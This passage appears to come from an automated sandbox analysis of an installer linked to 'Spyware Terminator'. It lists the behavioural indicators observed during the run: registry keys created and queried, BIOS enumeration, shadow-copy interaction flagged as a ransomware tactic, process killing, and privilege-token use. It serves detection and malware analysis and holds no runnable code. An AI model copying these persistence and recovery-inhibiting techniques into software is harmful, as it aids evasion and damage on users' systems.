description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dxdiag.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dxdiag.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3064 timeout.exe 4816 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6028 vssadmin.exe -
Kills process with taskkill 2 IoCs
pid Process 4824 taskkill.exe 5216 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Approved Extensions regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions\{82A76710-4F98-4957-92BE-99648A4E2475} = 51667a6c4c1d3b35007bb198a81d3b0d8ab1de248b0c6468 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Approved Extensions regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions\{82A76710-4F98-4957-92BE-99648A4E2475} = 51667a6c4c1d3b35007bb198a81d3b0d8ab1de248b0c6468 regsvr32.exe -
Modifies data under HKEY_USERS 7 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" st_rsser64.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755799812007977" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ st_rsser64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" st_rsser64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" st_rsser64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" st_rsser64.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ = "C:\\Program Files (x86)\\Spyware Terminator\\STShell.dll" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" analyzefile.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" analyzefile.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\STShell64.STShellMenu\Clsid\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74CC240A-0E71-4F1A-9D11-B421621C5141}\Shell\Open\Command SpywareTerminator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 analyzefile.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\ = "Spyware Terminator 2015 Internet Guard" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ = "C:\\PROGRA~2\\SPYWAR~1\\STShell.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DF5B855-B362-4703-9374-F7939955F0A5}\1.0\FLAGS\ = "0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu\Clsid regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\STInternetGuard.ProtNego regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\*\shellex\ContextMenuHandlers regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" analyzefile.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 analyzefile.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\TypeLib regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\*\shellex\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\TypeLib\ = "{5DF5B855-B362-4703-9374-F7939955F0A5}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\STInternetGuard.JSObj\Clsid regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 analyzefile.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu\Clsid\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DF5B855-B362-4703-9374-F7939955F0A5}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Spyware Terminator\\" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 analyzefile.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\ = "Spyware Terminator 2015 Internet Guard" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell analyzefile.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" analyzefile.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4560 reg.exe 3288 reg.exe 2404 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 15 IoCs
pid Process 6140 chcp.com 4424 reg.exe 3976 reg.exe 4524 reg.exe 5424 reg.exe 5392 reg.exe 1428 reg.exe 536 reg.exe 3064 timeout.exe 4824 taskkill.exe 5216 taskkill.exe 1476 tasklist.exe 4652 findstr.exe 5376 myst-launcher-amd64.exe 4424 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2340 SpywareTerminatorSetup.tmp 2340 SpywareTerminatorSetup.tmp 2340 SpywareTerminatorSetup.tmp 2340 SpywareTerminatorSetup.tmp 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 3376 msedge.exe 3376 msedge.exe 4884 msedge.exe 4884 msedge.exe 4512 identity_helper.exe 4512 identity_helper.exe 812 st_rsser64.exe 812 st_rsser64.exe 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 344 msedge.exe 344 msedge.exe 344 msedge.exe 344 msedge.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 4172 msedge.exe 4172 msedge.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe 812 st_rsser64.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 5056 SpywareTerminator.exe 760 SpywareTerminator.exe 2344 iexplore.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1084 Setup.exe 2648 Setup.exe 4300 more.com 1424 more.com 3772 BraveSharedUpdater.exe 2344 iexplore.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
pid Process 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 5084 msedge.exe 5084 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 812 st_rsser64.exe Token: SeDebugPrivilege 5040 SpywareTerminator.exe Token: SeDebugPrivilege 760 SpywareTerminator.exe Token: SeDebugPrivilege 760 SpywareTerminator.exe Token: SeDebugPrivilege 3636 SpywareTerminator.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2340 SpywareTerminatorSetup.tmp 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 5040 SpywareTerminator.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 5052 SpywareTerminatorUpdate.exe 760 SpywareTerminator.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 4884 msedge.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 692 SpywareTerminatorShield.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 5040 SpywareTerminator.exe 5040 SpywareTerminator.exe 4172 msedge.exe 4884 msedge.exe 5056 SpywareTerminator.exe 5056 SpywareTerminator.exe 760 SpywareTerminator.exe 760 SpywareTerminator.exe 3824 analyzefile.exe 2344 iexplore.exe 1524 dxdiag.exe -
Suspicious use of WriteProcessMemory 64 IoCs
